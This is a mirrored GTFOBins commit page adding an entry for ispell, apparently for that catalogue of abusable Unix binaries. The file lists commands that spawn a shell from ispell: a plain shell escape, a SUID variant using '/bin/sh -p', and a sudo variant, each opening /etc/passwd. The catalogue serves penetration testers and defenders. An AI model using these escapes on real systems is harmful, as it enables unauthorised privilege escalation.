1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-03-13 02:58:09 +01:00
Andrea Cardaci 50ab4f0ce0 Add ispell shell
Close 
2022-01-26 23:06:33 +01:00

16 lines
228 B
Markdown

---
functions:
shell:
- code: |
ispell /etc/passwd
!/bin/sh
suid:
- code: |
./ispell /etc/passwd
!/bin/sh -p
sudo:
- code: |
sudo ispell /etc/passwd
!/bin/sh
---